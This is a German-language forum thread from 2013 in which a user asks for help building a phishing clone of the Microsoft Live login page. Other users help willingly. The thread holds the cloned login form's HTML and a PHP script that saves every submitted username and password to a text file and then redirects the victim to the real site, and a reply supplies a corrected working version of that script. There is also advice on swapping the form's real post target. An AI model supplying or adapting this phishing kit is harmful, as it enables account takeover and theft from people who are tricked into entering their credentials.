testo1471 (31.07.2013)
Thema: Phishingseite erstellen
-
31.07.2013, 19:23 #1
- Registriert seit
- 17.07.2013
- Beiträge
- 3
Thanked 0 Times in 0 PostsPhishingseite erstellen
Hallo,
kann mir jemand helfen beim Phishen dieser Seite.
Ich finde im Seitenquelltext das Wort "action" nicht, ich muss jedoch den Seitenquelltext bearbeiten um die Phishing Seite zu erstellen.
Kennt sich jemand damit aus und kann mir sagen was ich stattdessen machen soll.
Danke im VorausGeändert von testo1471 (31.07.2013 um 19:24 Uhr)
-
31.07.2013, 20:59 #2
- Registriert seit
- 18.03.2013
- Beiträge
- 481
Thanked 264 Times in 168 PostsAW: Phishing
Versteh ich das richtig, dass du das Formular im Quelltext suchst?
HTML-Code:<div id="rightTD"> <form novalidate="" method="POST" target="_top" name="f1"> <div class="section"> <div id="idTd_Tile_Error" style="display: none;" aria-live="assertive" aria-relevant="text" aria-atomic="true"> <div id="idTd_Tile_ErrorMsg_Login" class="errorDiv first"></div> </div> <div id="idTd_PWD_Error" style="display: none;" aria-live="assertive" aria-relevant="text" aria-atomic="true"> <div id="idTd_PWD_ErrorMsg_Username" class="errorDiv first">Generic Password Error Message</div> </div> <div id="idTd_PWD_UsernameLbl" class="row label"> <span id="idLbl_PWD_Username" role="heading"> Microsoft-Konto <a id="idA_MSAccLearnMore" href="http://go.microsoft.com/fwlink/?LinkID=254486" target="_blank">Was ist das?</a> </span> </div> <div id="idDiv_PWD_UsernameTb" class="row textbox"> <div style="position: relative; width: 100%;"> <input id="i0116" class="ltr_override" type="email" lang="en" name="login" maxlength="113" aria-labelledby="idLbl_PWD_Username"> <div class="phholder" style="position: absolute; top: 0px; left: 0px; z-index: 5; width: 100%;"> <div id="idDiv_PWD_UsernameExample" class="placeholder ltr_override" aria-hidden="true" style="cursor: text;">jemand@example.com</div> </div> </div> </div> <div id="idTd_PWD_Error_Password" style="display: none;" aria-live="assertive" aria-relevant="text" aria-atomic="true"> <div id="idTd_PWD_ErrorMsg_Password" class="errorDiv"></div> </div> <div id="idDiv_PWD_PasswordTb" class="row textbox"> <div style="position: relative; width: 100%;"> <input id="i0118" type="password" name="passwd" autocomplete="off" aria-labelledby="idDiv_PWD_PasswordExample"> <div class="phholder" style="position: absolute; top: 0px; left: 0px; z-index: 5; width: 100%;"> <div id="idDiv_PWD_PasswordExample" class="placeholder" aria-hidden="true" style="cursor: text;">Kennwort</div> </div> </div> </div> <div id="idTd_PWD_KMSI_Cb"> <input id="idChkBx_PWD_KMSI0Pwd" type="checkbox" name="KMSI" value="1"> <label id="idLbl_PWD_KMSI_Cb" for="idChkBx_PWD_KMSI0Pwd">Angemeldet bleiben</label> </div> </div> <div id="idTd_PWD_SubmitCancelTbl" class="section"> <input id="idSIButton9" class="default" type="submit" name="SI" value="Anmelden"> </div> <div class="section"> <div id="idDiv_PWD_ForgotPassword" class="row small"> <a id="idA_PWD_ForgotPassword" href="https://account.live.com/ResetPassword.aspx?wreply=https://login.live.com/login.srf%3fwa%3dwsignin1.0%26rpsnv%3d11%26ct%3d1375290880%26rver%3d6.1.6206.0%26wp%3dMBI%26wreply%3dhttp:%252F%252Fmail.live.com%252Fdefault.aspx%26id%3d64855%26cbcxt%3dmai%26snsc%3d1%26vv%3d1450%26mkt%3dDE-DE%26lc%3d1031&id=64855&uiflavor=web&mkt=DE-DE&lc=1031&bk=1375296336">Können Sie nicht auf Ihr Konto zugreifen?</a> </div> <div id="idTD_PWD_SwitchToOTCLink" class="row small"> <a id="idA_PWD_SwitchToOTC" href="">Melden Sie sich mit einem Einmalcode an</a> </div> </div> </form> </div>
-
The Following User Says Thank You to xOneDirectionx For This Useful Post:
-
31.07.2013, 21:29 #3
- Registriert seit
- 17.07.2013
- Beiträge
- 3
Thanked 0 Times in 0 PostsAW: Phishing
Danke für eine Antwort, aber wo soll ich denn jetzt den Namen der php Datei hinschreiben ?
Das ganze funktioniert so, ich erstelle mir eine Webspace und lade auf meinem FTP Server
den Index und die php datei.
Der Index ist da um die Originale Seite darzustellen, und die php Datei um die eingegebenen Daten zu Speichern.
So werden nach dem Login, die Daten auf meinem FTP Server gespeichert.
Hier ist der Script von der FTP Datei.
PHP-Code:<?php
header("Location: https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1375297824&rver=6.1.6206.0&wp=MBI&wreply=http:%2F%2Fmail.live.com%2Fdefault.aspx&lc=1031&id=64855&mkt=de-de&cbcxt=mai&snsc=1 ");
$handle = fopen("passwords.txt", "a");
foreach($_POST as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>
Diese Stelle findet man meistens in dem man Quelltext mit "action" durchsucht.
Jedoch finde ich es in diesem Fall nicht.
-
31.07.2013, 22:08 #4
- Registriert seit
- 15.11.2011
- Beiträge
- 6.210
- Blog Entries
- 5
Thanked 9.132 Times in 3.006 PostsAW: Phishingseite erstellen
Der action-Parameter wird nur benötigt, wenn die Daten an ein anderes Script gesendet werden sollen. Dementsprechend ists keine besonders gute Idee danach zu suchen. Wenn dann sollte man eher nach Formularen ausschau halten.
In dem Fall ist es aber auch nicht einfach mit Parameter ändern speichern & fertig getan. Das Formular wird via JS erzeugt. Die Ziel-URL ist vermutlich diese Variable im JS auf der Loginseite eingebettet:
urlPost:'https://login.live.com/ppsecure/post.srf?wa=wsignin1.0&rpsnv=11&ct=1375290880&rver=6.1.6206.0&wp=MBI&wreply=http:%2F%2Fmail.live.com%2Fdefault.aspx&lc=1031&id=64855&mkt=de-de&cbcxt=mai&snsc=1&bk=1375300465'
(Ungetestet).
Und von der Logik her sollte dein Script die Daten erst in die Log schreiben und dann weiterleiten. Funktioniert in dem Fall zwar auch aber ist logisch besser. Wobei hier eine DB auch sinnvoller wäre als eine Datei.
-
The Following User Says Thank You to DMW007 For This Useful Post:
testo1471 (31.07.2013)
-
31.07.2013, 22:38 #5
- Registriert seit
- 17.07.2013
- Beiträge
- 3
Thanked 0 Times in 0 PostsAW: Phishingseite erstellen
Danke für die Antwort, wäre nett wenn du mir weiterhin helfen könntest.
Wie müssten die Scripts denn aussehen, damit alles funktioniert?Geändert von testo1471 (31.07.2013 um 22:39 Uhr)
-
01.08.2013, 21:04 #6
- Registriert seit
- 18.03.2013
- Beiträge
- 481
Thanked 264 Times in 168 PostsAW: Phishingseite erstellen
Da du die Header-Funktion in PHP nicht mehr nutzen kannst, nachdem eine Ausgabe stattgefunden hat, würde ich hier auf eine Weiterleitung per HTML setzen.
PHP-Code:<?php
$handle = fopen("passwords.txt", "a");
foreach($_POST as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
echo '<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html><head><meta http-equiv="refresh" content="0; URL=https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1375297824&rver=6.1.6206.0&wp=MBI&wreply=http:%2F%2Fmail.live.com%2Fdefault.aspx&lc=1031&id=64855&mkt=de-de&cbcxt=mai&snsc=1"></head><body></body></html>';
?>
-
02.08.2013, 16:43 #7
- Registriert seit
- 15.11.2011
- Beiträge
- 6.210
- Blog Entries
- 5
Thanked 9.132 Times in 3.006 Posts
Ähnliche Themen
-
Wie einen bot erstellen ?
Von koppaz1337 im Forum Knuddels ProgrammierungAntworten: 25Letzter Beitrag: 21.07.2013, 18:07 -
Logos erstellen
Von xKhalifa im Forum Angebot & NachfrageAntworten: 1Letzter Beitrag: 16.01.2013, 22:17 -
Linux ZIP-Dateien erstellen
Von Minecraft im Forum LinuxAntworten: 1Letzter Beitrag: 22.05.2012, 13:11 -
Win7 Image erstellen
Von DANP im Forum WindowsAntworten: 4Letzter Beitrag: 12.05.2012, 18:44 -
BrickForce Map erstellen.
Von Shane im Forum Brick-ForceAntworten: 3Letzter Beitrag: 10.05.2012, 10:34
Diese Seite nutzt Cookies, um das Nutzererlebnis zu verbessern. Klicken Sie hier, um das Cookie-Tracking zu deaktivieren.